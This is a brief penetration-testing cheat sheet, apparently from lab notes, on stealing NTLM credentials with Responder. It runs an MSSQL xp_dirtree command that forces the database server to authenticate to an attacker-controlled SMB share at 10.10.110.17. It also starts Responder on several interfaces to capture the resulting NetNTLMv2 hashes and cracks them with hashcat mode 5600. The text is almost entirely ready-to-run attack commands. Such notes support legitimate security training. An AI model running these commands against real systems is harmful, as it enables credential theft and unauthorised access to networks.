Responder
All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/
). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.
# Once connected to MSSQL this will acccess the share
EXEC master..xp_dirtree '\\10.10.110.17\share\'
# Attacker machine you will get the user hash
sudo responder -I tun0
# Just run this in the victime machine and it will spit out NTLM hash with username
sudo responder -I ens224
sudo responder -I ens33
Last updated